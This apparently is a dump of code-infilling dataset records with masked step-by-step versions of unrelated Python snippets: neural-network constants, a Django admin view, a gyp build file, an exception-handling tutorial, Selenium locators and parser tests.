"step-2": "<mask token>\n\n\nclass Constants:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Constants:\n DNN_DEFAULT_ACTIVATION = 'relu'\n DNN_DEFAULT_KERNEL_REGULARIZATION = [0, 5e-05]\n DNN_DEFAULT_BIAS_REGULARIZATION = [0, 5e-05]\n DNN_DEFAULT_LOSS = 'mean_squared_error'\n DNN_DEFAULT_VALIDATION_SPLIT = 0.2\n DNN_DEFAULT_EPOCHS = 100\n DNN_DEFAULT_CHECKPOINT_PERIOD = 100\n DNN_DEFAULT_VALIDATION_PERIOD = 1\n DNN_DEFAULT_PATIENCE = 1000\n DNN_DEFAULT_BATCH_SIZE = 16\n DNN_DEFAULT_OPTIMIZER = 'adam'\n DNN_DEFAULT_DROPOUT_RATE = 0.02\n DNN_DEFAULT_DECAY = 0\n DNN_DEFAULT_BIAS = 0.1\n DNN_DEFAULT_OUTPUT_BIAS = 0.5\n",
"step-4": "import numpy as np\n\n\nclass Constants:\n DNN_DEFAULT_ACTIVATION = 'relu'\n DNN_DEFAULT_KERNEL_REGULARIZATION = [0, 5e-05]\n DNN_DEFAULT_BIAS_REGULARIZATION = [0, 5e-05]\n DNN_DEFAULT_LOSS = 'mean_squared_error'\n DNN_DEFAULT_VALIDATION_SPLIT = 0.2\n DNN_DEFAULT_EPOCHS = 100\n DNN_DEFAULT_CHECKPOINT_PERIOD = 100\n DNN_DEFAULT_VALIDATION_PERIOD = 1\n DNN_DEFAULT_PATIENCE = 1000\n DNN_DEFAULT_BATCH_SIZE = 16\n DNN_DEFAULT_OPTIMIZER = 'adam'\n DNN_DEFAULT_DROPOUT_RATE = 0.02\n DNN_DEFAULT_DECAY = 0\n DNN_DEFAULT_BIAS = 0.1\n DNN_DEFAULT_OUTPUT_BIAS = 0.5\n",
"step-5": "import numpy as np\n\nclass Constants():\n DNN_DEFAULT_ACTIVATION = 'relu'\n DNN_DEFAULT_KERNEL_REGULARIZATION = [0, 5e-5]\n DNN_DEFAULT_BIAS_REGULARIZATION = [0, 5e-5]\n DNN_DEFAULT_LOSS = 'mean_squared_error'\n DNN_DEFAULT_VALIDATION_SPLIT = 0.2\n DNN_DEFAULT_EPOCHS = 100\n DNN_DEFAULT_CHECKPOINT_PERIOD = 100\n DNN_DEFAULT_VALIDATION_PERIOD = 1\n DNN_DEFAULT_PATIENCE = 1000\n DNN_DEFAULT_BATCH_SIZE = 16\n DNN_DEFAULT_OPTIMIZER = 'adam'\n DNN_DEFAULT_DROPOUT_RATE = 0.02\n DNN_DEFAULT_DECAY = 0\n DNN_DEFAULT_BIAS = 0.1\n DNN_DEFAULT_OUTPUT_BIAS = 0.5",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django.shortcuts import render, redirect
from datetime import datetime
from fichefrais.models import FicheFrais, Etat, LigneFraisForfait, LigneFraisHorsForfait, Forfait
def home_admin(request):
    """
    :view home_admin: Main menu for administrators.
    :template home_admin.html:

    Redirects anonymous users to the login page, otherwise renders the
    administrator dashboard with the expense-report querysets the
    template iterates over.
    """
    if not request.user.is_authenticated():
        # NOTE(review): called as a method, which matches Django < 1.10;
        # on Django >= 1.10 ``is_authenticated`` is a property — confirm
        # the installed Django version.
        return redirect("login")
    title = "Accueil"
    today = datetime.now()
    # Bare model managers (not evaluated here); the template queries them.
    etat = Etat.objects
    fiche_frais = FicheFrais.objects
    frais_forfait = Forfait.objects
    lignes_frais_forfait = LigneFraisForfait.objects
    lignes_frais_hors_forfait = LigneFraisHorsForfait.objects
    context = {
        "title": title,
        "user": request.user,
        "fiche_frais": fiche_frais,
        "lignes_frais_forfait": lignes_frais_forfait,
        "lignes_frais_hors_forfait": lignes_frais_hors_forfait,
        "etat": etat,
        "today": today,
        "frais_forfait": frais_forfait,
    }
    return render(request, "fichefrais/administrateur/home_admin.html", context)
|
normal
|
{
"blob_id": "b453c8e9cc50066d1b5811493a89de384a000f37",
"index": 4929,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef home_admin(request):\n \"\"\"\n :view home_admin: Menu principale des Administrateurs\n :template home_admin.html:\n \"\"\"\n if not request.user.is_authenticated():\n return redirect('login')\n title = 'Accueil'\n today = datetime.now()\n etat = Etat.objects\n fiche_frais = FicheFrais.objects\n frais_forfait = Forfait.objects\n lignes_frais_forfait = LigneFraisForfait.objects\n lignes_frais_hors_forfait = LigneFraisHorsForfait.objects\n context = {'title': title, 'user': request.user, 'fiche_frais':\n fiche_frais, 'lignes_frais_forfait': lignes_frais_forfait,\n 'lignes_frais_hors_forfait': lignes_frais_hors_forfait, 'etat':\n etat, 'today': today, 'frais_forfait': frais_forfait}\n return render(request, 'fichefrais/administrateur/home_admin.html', context\n )\n",
"step-3": "from django.shortcuts import render, redirect\nfrom datetime import datetime\nfrom fichefrais.models import FicheFrais, Etat, LigneFraisForfait, LigneFraisHorsForfait, Forfait\n\n\ndef home_admin(request):\n \"\"\"\n :view home_admin: Menu principale des Administrateurs\n :template home_admin.html:\n \"\"\"\n if not request.user.is_authenticated():\n return redirect('login')\n title = 'Accueil'\n today = datetime.now()\n etat = Etat.objects\n fiche_frais = FicheFrais.objects\n frais_forfait = Forfait.objects\n lignes_frais_forfait = LigneFraisForfait.objects\n lignes_frais_hors_forfait = LigneFraisHorsForfait.objects\n context = {'title': title, 'user': request.user, 'fiche_frais':\n fiche_frais, 'lignes_frais_forfait': lignes_frais_forfait,\n 'lignes_frais_hors_forfait': lignes_frais_hors_forfait, 'etat':\n etat, 'today': today, 'frais_forfait': frais_forfait}\n return render(request, 'fichefrais/administrateur/home_admin.html', context\n )\n",
"step-4": "from django.shortcuts import render, redirect\nfrom datetime import datetime\nfrom fichefrais.models import FicheFrais, Etat, LigneFraisForfait, LigneFraisHorsForfait, Forfait\n\n\ndef home_admin(request):\n \"\"\"\n :view home_admin: Menu principale des Administrateurs\n :template home_admin.html:\n \"\"\"\n if not request.user.is_authenticated():\n return redirect(\"login\")\n\n title = \"Accueil\"\n today = datetime.now()\n\n etat = Etat.objects\n fiche_frais = FicheFrais.objects\n frais_forfait = Forfait.objects\n lignes_frais_forfait = LigneFraisForfait.objects\n lignes_frais_hors_forfait = LigneFraisHorsForfait.objects\n\n context = {\n \"title\": title,\n \"user\": request.user,\n \"fiche_frais\": fiche_frais,\n \"lignes_frais_forfait\": lignes_frais_forfait,\n \"lignes_frais_hors_forfait\": lignes_frais_hors_forfait,\n \"etat\": etat,\n \"today\": today,\n \"frais_forfait\": frais_forfait,\n }\n\n return render(request, \"fichefrais/administrateur/home_admin.html\", context)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
{
"targets": [
{
"target_name": "force-layout",
"sources": [ "src/main.cc", "src/layout.cc", "src/quadTree.cc" ],
'conditions': [
['OS=="win"', {
'cflags': [
'/WX', "/std:latest", "/m"
],
}, { # OS != "win"
'cflags': [
"-std=c++11", "-fpermissive", "-fexceptions"
],
}],
],
'cflags!': [ '-fno-exceptions' ],
'cflags_cc!': [ '-fno-exceptions' ]
}
]
}
|
normal
|
{
"blob_id": "0f916a1f638bf149f6992355cf8f33f74bc9bdb1",
"index": 8439,
"step-1": "<mask token>\n",
"step-2": "{'targets': [{'target_name': 'force-layout', 'sources': ['src/main.cc',\n 'src/layout.cc', 'src/quadTree.cc'], 'conditions': [['OS==\"win\"', {\n 'cflags': ['/WX', '/std:latest', '/m']}, {'cflags': ['-std=c++11',\n '-fpermissive', '-fexceptions']}]], 'cflags!': ['-fno-exceptions'],\n 'cflags_cc!': ['-fno-exceptions']}]}\n",
"step-3": "{\n \"targets\": [\n {\n \"target_name\": \"force-layout\",\n \"sources\": [ \"src/main.cc\", \"src/layout.cc\", \"src/quadTree.cc\" ],\n 'conditions': [\n ['OS==\"win\"', {\n 'cflags': [\n '/WX', \"/std:latest\", \"/m\"\n ],\n }, { # OS != \"win\"\n 'cflags': [\n \"-std=c++11\", \"-fpermissive\", \"-fexceptions\"\n ],\n }],\n ],\n 'cflags!': [ '-fno-exceptions' ],\n 'cflags_cc!': [ '-fno-exceptions' ]\n }\n ]\n}\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
try:
fh = open('testfile.txt', 'w')
fh.write('This is my test file for exception handling! !')
except IOError:
print("Error: can't find file or read data")
else:
print('written content in the file successfully')
fh = open('testfile.txt', 'r+')
print(fh.read())
fh.close()
print(fh.closed)
try:
fileptr = open('file.txt', 'w')
try:
fileptr.write('Hi I am good')
finally:
fileptr.close()
print('file.closed')
except:
print('Error')
else:
print('inside else block')
try:
age = int(input('Enter the age?'))
if age < 18:
raise ValueError
else:
print('the age is valid')
except ValueError:
print('The age is not valid')
<|reserved_special_token_1|>
'''import math
x = 5
print("sqrt of 5 is", math.sqrt(64))
str1 = "bollywood"
str2 = 'ody'
if str2 in str1:
    print("String found")
else:
    print("String not found")
    print(10+20)'''
# Skeleton of the try/except/else statement exercised below:
#try:
    #block of code
#except Exception as e:
    #block of code
#else:
    #this code runs only when the except block did NOT run
# Demo 1: write a file, then (on success) reopen it and echo its contents.
try:
    fh = open("testfile.txt", "w")
    fh.write("This is my test file for exception handling! !")
except IOError:
    print("Error: can\'t find file or read data")
else:
    # Runs only when the write above raised no IOError.
    print("written content in the file successfully")
    fh = open("testfile.txt", "r+")
    print(fh.read())
    fh.close()
    print(fh.closed)  # True: the handle was closed just above
# Demo 2: try/finally — the file is closed whether or not write() fails.
try:
    fileptr = open("file.txt", "w")
    try:
        fileptr.write("Hi I am good")
    finally:
        # Cleanup always executes, even if the write raised.
        fileptr.close()
        print("file.closed")
except:
    # NOTE(review): bare except hides all errors; prefer `except OSError:`.
    print("Error")
else:
    print("inside else block")
# Demo 3: raising an exception manually to validate user input.
try:
    age = int(input("Enter the age?"))
    if age<18:
        raise ValueError
    else:
        print("the age is valid")
except ValueError:
    # Triggered by a non-integer input or an age below 18.
    print("The age is not valid")
|
flexible
|
{
"blob_id": "c5b40b373953a2375eeca453a65c49bdbb8715f1",
"index": 6586,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntry:\n fh = open('testfile.txt', 'w')\n fh.write('This is my test file for exception handling! !')\nexcept IOError:\n print(\"Error: can't find file or read data\")\nelse:\n print('written content in the file successfully')\n fh = open('testfile.txt', 'r+')\n print(fh.read())\n fh.close()\n print(fh.closed)\ntry:\n fileptr = open('file.txt', 'w')\n try:\n fileptr.write('Hi I am good')\n finally:\n fileptr.close()\n print('file.closed')\nexcept:\n print('Error')\nelse:\n print('inside else block')\ntry:\n age = int(input('Enter the age?'))\n if age < 18:\n raise ValueError\n else:\n print('the age is valid')\nexcept ValueError:\n print('The age is not valid')\n",
"step-3": "'''import math\nx = 5\nprint(\"sqrt of 5 is\", math.sqrt(64))\n\nstr1 = \"bollywood\"\n\nstr2 = 'ody'\n\nif str2 in str1:\n print(\"String found\")\nelse:\n print(\"String not found\")\n\n print(10+20)'''\n\n#try:\n #block of code\n#except Exception l:\n #block of code\n#else:\n #this code executes if except block is executed\n\ntry:\n fh = open(\"testfile.txt\", \"w\")\n fh.write(\"This is my test file for exception handling! !\")\n\nexcept IOError:\n print(\"Error: can\\'t find file or read data\")\nelse:\n\n print(\"written content in the file successfully\")\n\n fh = open(\"testfile.txt\", \"r+\")\n print(fh.read())\n fh.close()\n print(fh.closed)\n\ntry:\n fileptr = open(\"file.txt\", \"w\")\n try:\n fileptr.write(\"Hi I am good\")\n\n\n finally:\n fileptr.close()\n print(\"file.closed\")\nexcept:\n print(\"Error\")\nelse:\n print(\"inside else block\")\n\n\ntry:\n age = int(input(\"Enter the age?\"))\n if age<18:\n raise ValueError\n else:\n print(\"the age is valid\")\nexcept ValueError:\n print(\"The age is not valid\")\n\n\n\n\n\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class BasketPageLocators:
BASKET_STATUS = By.CSS_SELECTOR, '#content_inner'
NAME_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,
'#messages .alert:nth-child(1) > .alertinner strong')
PRICE_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,
'#messages .alert:nth-child(3) > .alertinner strong')
class ProductPageLocators:
ADD_IN_BASKET = By.CSS_SELECTOR, '.btn-add-to-basket'
SHIPMENT_PRICE = By.CSS_SELECTOR, '.product_main .price_color'
SHIPMENT_NAME = By.CSS_SELECTOR, '.product_main h1'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class LoginPageLocators:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class BasketPageLocators:
BASKET_STATUS = By.CSS_SELECTOR, '#content_inner'
NAME_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,
'#messages .alert:nth-child(1) > .alertinner strong')
PRICE_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,
'#messages .alert:nth-child(3) > .alertinner strong')
class ProductPageLocators:
ADD_IN_BASKET = By.CSS_SELECTOR, '.btn-add-to-basket'
SHIPMENT_PRICE = By.CSS_SELECTOR, '.product_main .price_color'
SHIPMENT_NAME = By.CSS_SELECTOR, '.product_main h1'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class LoginPageLocators:
LOG_IN_FORM = By.CSS_SELECTOR, '#login_form'
REGISTER_FORM = By.CSS_SELECTOR, '#register_form'
REGISTRATION_EMAIL = By.CSS_SELECTOR, '#id_registration-email'
REGISTRATION_PASSWORD = By.CSS_SELECTOR, '#id_registration-password1'
REGISTRATION_PASSWORD_CONFIRM = (By.CSS_SELECTOR,
'#id_registration-password2')
REGISTRATION_SUBMIT_BUTTON = (By.CSS_SELECTOR,
'[name="registration_submit"]')
class BasketPageLocators:
BASKET_STATUS = By.CSS_SELECTOR, '#content_inner'
NAME_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,
'#messages .alert:nth-child(1) > .alertinner strong')
PRICE_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,
'#messages .alert:nth-child(3) > .alertinner strong')
class ProductPageLocators:
ADD_IN_BASKET = By.CSS_SELECTOR, '.btn-add-to-basket'
SHIPMENT_PRICE = By.CSS_SELECTOR, '.product_main .price_color'
SHIPMENT_NAME = By.CSS_SELECTOR, '.product_main h1'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BasePageLocators:
LOGIN_LINK = By.CSS_SELECTOR, '#login_link'
BASKET_LINK = By.CSS_SELECTOR, '[class="btn btn-default"]:nth-child(1)'
USER_ICON = By.CSS_SELECTOR, '.icon-user'
class LoginPageLocators:
LOG_IN_FORM = By.CSS_SELECTOR, '#login_form'
REGISTER_FORM = By.CSS_SELECTOR, '#register_form'
REGISTRATION_EMAIL = By.CSS_SELECTOR, '#id_registration-email'
REGISTRATION_PASSWORD = By.CSS_SELECTOR, '#id_registration-password1'
REGISTRATION_PASSWORD_CONFIRM = (By.CSS_SELECTOR,
'#id_registration-password2')
REGISTRATION_SUBMIT_BUTTON = (By.CSS_SELECTOR,
'[name="registration_submit"]')
class BasketPageLocators:
BASKET_STATUS = By.CSS_SELECTOR, '#content_inner'
NAME_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,
'#messages .alert:nth-child(1) > .alertinner strong')
PRICE_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,
'#messages .alert:nth-child(3) > .alertinner strong')
class ProductPageLocators:
ADD_IN_BASKET = By.CSS_SELECTOR, '.btn-add-to-basket'
SHIPMENT_PRICE = By.CSS_SELECTOR, '.product_main .price_color'
SHIPMENT_NAME = By.CSS_SELECTOR, '.product_main h1'
<|reserved_special_token_1|>
from selenium.webdriver.common.by import By
class BasePageLocators:
LOGIN_LINK = (By.CSS_SELECTOR, "#login_link")
BASKET_LINK = (By.CSS_SELECTOR, '[class="btn btn-default"]:nth-child(1)')
USER_ICON = (By.CSS_SELECTOR, ".icon-user")
class LoginPageLocators:
LOG_IN_FORM = (By.CSS_SELECTOR, "#login_form")
REGISTER_FORM = (By.CSS_SELECTOR, "#register_form")
REGISTRATION_EMAIL = (By.CSS_SELECTOR, '#id_registration-email')
REGISTRATION_PASSWORD = (By.CSS_SELECTOR, '#id_registration-password1')
REGISTRATION_PASSWORD_CONFIRM = (By.CSS_SELECTOR, '#id_registration-password2')
REGISTRATION_SUBMIT_BUTTON = (By.CSS_SELECTOR, '[name="registration_submit"]')
class BasketPageLocators:
BASKET_STATUS = (By.CSS_SELECTOR, '#content_inner')
NAME_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR, '#messages .alert:nth-child(1) > .alertinner strong')
PRICE_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR, '#messages .alert:nth-child(3) > .alertinner strong')
class ProductPageLocators:
ADD_IN_BASKET = (By.CSS_SELECTOR, '.btn-add-to-basket')
SHIPMENT_PRICE = (By.CSS_SELECTOR, '.product_main .price_color')
SHIPMENT_NAME = (By.CSS_SELECTOR, '.product_main h1')
|
flexible
|
{
"blob_id": "5d3b9005b8924da36a5885201339aa41082034cd",
"index": 8692,
"step-1": "<mask token>\n\n\nclass BasketPageLocators:\n BASKET_STATUS = By.CSS_SELECTOR, '#content_inner'\n NAME_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,\n '#messages .alert:nth-child(1) > .alertinner strong')\n PRICE_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,\n '#messages .alert:nth-child(3) > .alertinner strong')\n\n\nclass ProductPageLocators:\n ADD_IN_BASKET = By.CSS_SELECTOR, '.btn-add-to-basket'\n SHIPMENT_PRICE = By.CSS_SELECTOR, '.product_main .price_color'\n SHIPMENT_NAME = By.CSS_SELECTOR, '.product_main h1'\n",
"step-2": "<mask token>\n\n\nclass LoginPageLocators:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass BasketPageLocators:\n BASKET_STATUS = By.CSS_SELECTOR, '#content_inner'\n NAME_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,\n '#messages .alert:nth-child(1) > .alertinner strong')\n PRICE_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,\n '#messages .alert:nth-child(3) > .alertinner strong')\n\n\nclass ProductPageLocators:\n ADD_IN_BASKET = By.CSS_SELECTOR, '.btn-add-to-basket'\n SHIPMENT_PRICE = By.CSS_SELECTOR, '.product_main .price_color'\n SHIPMENT_NAME = By.CSS_SELECTOR, '.product_main h1'\n",
"step-3": "<mask token>\n\n\nclass LoginPageLocators:\n LOG_IN_FORM = By.CSS_SELECTOR, '#login_form'\n REGISTER_FORM = By.CSS_SELECTOR, '#register_form'\n REGISTRATION_EMAIL = By.CSS_SELECTOR, '#id_registration-email'\n REGISTRATION_PASSWORD = By.CSS_SELECTOR, '#id_registration-password1'\n REGISTRATION_PASSWORD_CONFIRM = (By.CSS_SELECTOR,\n '#id_registration-password2')\n REGISTRATION_SUBMIT_BUTTON = (By.CSS_SELECTOR,\n '[name=\"registration_submit\"]')\n\n\nclass BasketPageLocators:\n BASKET_STATUS = By.CSS_SELECTOR, '#content_inner'\n NAME_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,\n '#messages .alert:nth-child(1) > .alertinner strong')\n PRICE_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,\n '#messages .alert:nth-child(3) > .alertinner strong')\n\n\nclass ProductPageLocators:\n ADD_IN_BASKET = By.CSS_SELECTOR, '.btn-add-to-basket'\n SHIPMENT_PRICE = By.CSS_SELECTOR, '.product_main .price_color'\n SHIPMENT_NAME = By.CSS_SELECTOR, '.product_main h1'\n",
"step-4": "<mask token>\n\n\nclass BasePageLocators:\n LOGIN_LINK = By.CSS_SELECTOR, '#login_link'\n BASKET_LINK = By.CSS_SELECTOR, '[class=\"btn btn-default\"]:nth-child(1)'\n USER_ICON = By.CSS_SELECTOR, '.icon-user'\n\n\nclass LoginPageLocators:\n LOG_IN_FORM = By.CSS_SELECTOR, '#login_form'\n REGISTER_FORM = By.CSS_SELECTOR, '#register_form'\n REGISTRATION_EMAIL = By.CSS_SELECTOR, '#id_registration-email'\n REGISTRATION_PASSWORD = By.CSS_SELECTOR, '#id_registration-password1'\n REGISTRATION_PASSWORD_CONFIRM = (By.CSS_SELECTOR,\n '#id_registration-password2')\n REGISTRATION_SUBMIT_BUTTON = (By.CSS_SELECTOR,\n '[name=\"registration_submit\"]')\n\n\nclass BasketPageLocators:\n BASKET_STATUS = By.CSS_SELECTOR, '#content_inner'\n NAME_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,\n '#messages .alert:nth-child(1) > .alertinner strong')\n PRICE_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR,\n '#messages .alert:nth-child(3) > .alertinner strong')\n\n\nclass ProductPageLocators:\n ADD_IN_BASKET = By.CSS_SELECTOR, '.btn-add-to-basket'\n SHIPMENT_PRICE = By.CSS_SELECTOR, '.product_main .price_color'\n SHIPMENT_NAME = By.CSS_SELECTOR, '.product_main h1'\n",
"step-5": "from selenium.webdriver.common.by import By\n\n\nclass BasePageLocators:\n LOGIN_LINK = (By.CSS_SELECTOR, \"#login_link\")\n BASKET_LINK = (By.CSS_SELECTOR, '[class=\"btn btn-default\"]:nth-child(1)')\n USER_ICON = (By.CSS_SELECTOR, \".icon-user\")\n\n\nclass LoginPageLocators:\n LOG_IN_FORM = (By.CSS_SELECTOR, \"#login_form\")\n REGISTER_FORM = (By.CSS_SELECTOR, \"#register_form\")\n REGISTRATION_EMAIL = (By.CSS_SELECTOR, '#id_registration-email')\n REGISTRATION_PASSWORD = (By.CSS_SELECTOR, '#id_registration-password1')\n REGISTRATION_PASSWORD_CONFIRM = (By.CSS_SELECTOR, '#id_registration-password2')\n REGISTRATION_SUBMIT_BUTTON = (By.CSS_SELECTOR, '[name=\"registration_submit\"]')\n\n\nclass BasketPageLocators:\n BASKET_STATUS = (By.CSS_SELECTOR, '#content_inner')\n NAME_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR, '#messages .alert:nth-child(1) > .alertinner strong')\n PRICE_OF_ADDED_SHIPMENT = (By.CSS_SELECTOR, '#messages .alert:nth-child(3) > .alertinner strong')\n\n\nclass ProductPageLocators:\n ADD_IN_BASKET = (By.CSS_SELECTOR, '.btn-add-to-basket')\n SHIPMENT_PRICE = (By.CSS_SELECTOR, '.product_main .price_color')\n SHIPMENT_NAME = (By.CSS_SELECTOR, '.product_main h1')\n\n",
"step-ids": [
4,
5,
6,
8,
10
]
}
|
[
4,
5,
6,
8,
10
] |
<|reserved_special_token_0|>
@pytest.mark.parametrize('expression,result', [('< 1 2 3>', NDArray(shape=(
3,), data=[1, 2, 3], constant=False))])
def test_parse_vector(expression, result):
parser = build_parser(start='vector')
assert parser.parse(expression) == result
<|reserved_special_token_0|>
@pytest.mark.parametrize('expression, result', [('j psi x', BinaryOperation
(operator='PSI', left=NDArray(shape=None, data=None, constant=False,
identifier='j'), right=NDArray(shape=None, data=None, constant=False,
identifier='x'))), ('A omega <1 2>', BinaryOperation(operator='OMEGA',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=(2,), data=[1, 2], constant=False, identifier=None)
)), ('A omega B cat C', BinaryOperation(operator='CAT', left=
BinaryOperation(operator='OMEGA', left=NDArray(shape=None, data=None,
constant=False, identifier='A'), right=NDArray(shape=None, data=None,
constant=False, identifier='B')), right=NDArray(shape=None, data=None,
constant=False, identifier='C'))), ('(A omega B) cat C',
BinaryOperation(operator='CAT', left=BinaryOperation(operator='OMEGA',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=None, data=None, constant=False, identifier='B')),
right=NDArray(shape=None, data=None, constant=False, identifier='C'))),
('dim A cat B', BinaryOperation(operator='CAT', left=UnaryOperation(
operator='DIM', right=NDArray(shape=None, data=None, constant=False,
identifier='A')), right=NDArray(shape=None, data=None, constant=False,
identifier='B'))), ('dim (A cat B)', UnaryOperation(operator='DIM',
right=BinaryOperation(operator='CAT', left=NDArray(shape=None, data=
None, constant=False, identifier='A'), right=NDArray(shape=None, data=
None, constant=False, identifier='B'))))])
def test_parse_terms_and_operators(expression, result):
parser = build_parser(start='term')
assert parser.parse(expression) == result
@pytest.mark.parametrize('expression, result', [('main(){}', Function(
arguments=[], statements=[], identifier='main')), (
'foo_bar(array A^1 <5>){}', Function(arguments=[NDArray(shape=(5,),
data=None, constant=False, identifier='A')], statements=[], identifier=
'foo_bar')), ('BizBAZZ(array A^2 < 3 5>, array B^3 <6 5 8>){}',
Function(arguments=[NDArray(shape=(3, 5), data=None, constant=False,
identifier='A'), NDArray(shape=(6, 5, 8), data=None, constant=False,
identifier='B')], statements=[], identifier='BizBAZZ')), (
'A_2_3_a(array A^2 <9 1>, array B^2 <3 1>, array ASDF^1 <9>){}',
Function(arguments=[NDArray(shape=(9, 1), data=None, constant=False,
identifier='A'), NDArray(shape=(3, 1), data=None, constant=False,
identifier='B'), NDArray(shape=(9,), data=None, constant=False,
identifier='ASDF')], statements=[], identifier='A_2_3_a'))])
def test_parse_function(expression, result):
parser = build_parser(start='function')
assert parser.parse(expression) == result
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@pytest.mark.parametrize('expression,result', [('< 1 2 3>', NDArray(shape=(
3,), data=[1, 2, 3], constant=False))])
def test_parse_vector(expression, result):
parser = build_parser(start='vector')
assert parser.parse(expression) == result
@pytest.mark.parametrize('expression, result', [('const array A^3 <4 3 5>',
NDArray(shape=(4, 3, 5), data=None, constant=True, identifier='A'))])
def test_parse_constant_arrays(expression, result):
parser = build_parser(start='constant_array')
assert parser.parse(expression) == result
<|reserved_special_token_0|>
@pytest.mark.parametrize('expression, result', [('j psi x', BinaryOperation
(operator='PSI', left=NDArray(shape=None, data=None, constant=False,
identifier='j'), right=NDArray(shape=None, data=None, constant=False,
identifier='x'))), ('A omega <1 2>', BinaryOperation(operator='OMEGA',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=(2,), data=[1, 2], constant=False, identifier=None)
)), ('A omega B cat C', BinaryOperation(operator='CAT', left=
BinaryOperation(operator='OMEGA', left=NDArray(shape=None, data=None,
constant=False, identifier='A'), right=NDArray(shape=None, data=None,
constant=False, identifier='B')), right=NDArray(shape=None, data=None,
constant=False, identifier='C'))), ('(A omega B) cat C',
BinaryOperation(operator='CAT', left=BinaryOperation(operator='OMEGA',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=None, data=None, constant=False, identifier='B')),
right=NDArray(shape=None, data=None, constant=False, identifier='C'))),
('dim A cat B', BinaryOperation(operator='CAT', left=UnaryOperation(
operator='DIM', right=NDArray(shape=None, data=None, constant=False,
identifier='A')), right=NDArray(shape=None, data=None, constant=False,
identifier='B'))), ('dim (A cat B)', UnaryOperation(operator='DIM',
right=BinaryOperation(operator='CAT', left=NDArray(shape=None, data=
None, constant=False, identifier='A'), right=NDArray(shape=None, data=
None, constant=False, identifier='B'))))])
def test_parse_terms_and_operators(expression, result):
parser = build_parser(start='term')
assert parser.parse(expression) == result
@pytest.mark.parametrize('expression, result', [('main(){}', Function(
arguments=[], statements=[], identifier='main')), (
'foo_bar(array A^1 <5>){}', Function(arguments=[NDArray(shape=(5,),
data=None, constant=False, identifier='A')], statements=[], identifier=
'foo_bar')), ('BizBAZZ(array A^2 < 3 5>, array B^3 <6 5 8>){}',
Function(arguments=[NDArray(shape=(3, 5), data=None, constant=False,
identifier='A'), NDArray(shape=(6, 5, 8), data=None, constant=False,
identifier='B')], statements=[], identifier='BizBAZZ')), (
'A_2_3_a(array A^2 <9 1>, array B^2 <3 1>, array ASDF^1 <9>){}',
Function(arguments=[NDArray(shape=(9, 1), data=None, constant=False,
identifier='A'), NDArray(shape=(3, 1), data=None, constant=False,
identifier='B'), NDArray(shape=(9,), data=None, constant=False,
identifier='ASDF')], statements=[], identifier='A_2_3_a'))])
def test_parse_function(expression, result):
parser = build_parser(start='function')
assert parser.parse(expression) == result
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@pytest.mark.parametrize('expression,result', [('< 1 2 3>', NDArray(shape=(
3,), data=[1, 2, 3], constant=False))])
def test_parse_vector(expression, result):
parser = build_parser(start='vector')
assert parser.parse(expression) == result
@pytest.mark.parametrize('expression, result', [('const array A^3 <4 3 5>',
NDArray(shape=(4, 3, 5), data=None, constant=True, identifier='A'))])
def test_parse_constant_arrays(expression, result):
parser = build_parser(start='constant_array')
assert parser.parse(expression) == result
@pytest.mark.parametrize('expression, result', [('array Zasdf_asdf^1 <3>',
NDArray(shape=(3,), data=None, constant=False, identifier='Zasdf_asdf'))])
def test_parse_arrays(expression, result):
parser = build_parser(start='array')
assert parser.parse(expression) == result
@pytest.mark.parametrize('expression, result', [('j psi x', BinaryOperation
(operator='PSI', left=NDArray(shape=None, data=None, constant=False,
identifier='j'), right=NDArray(shape=None, data=None, constant=False,
identifier='x'))), ('A omega <1 2>', BinaryOperation(operator='OMEGA',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=(2,), data=[1, 2], constant=False, identifier=None)
)), ('A omega B cat C', BinaryOperation(operator='CAT', left=
BinaryOperation(operator='OMEGA', left=NDArray(shape=None, data=None,
constant=False, identifier='A'), right=NDArray(shape=None, data=None,
constant=False, identifier='B')), right=NDArray(shape=None, data=None,
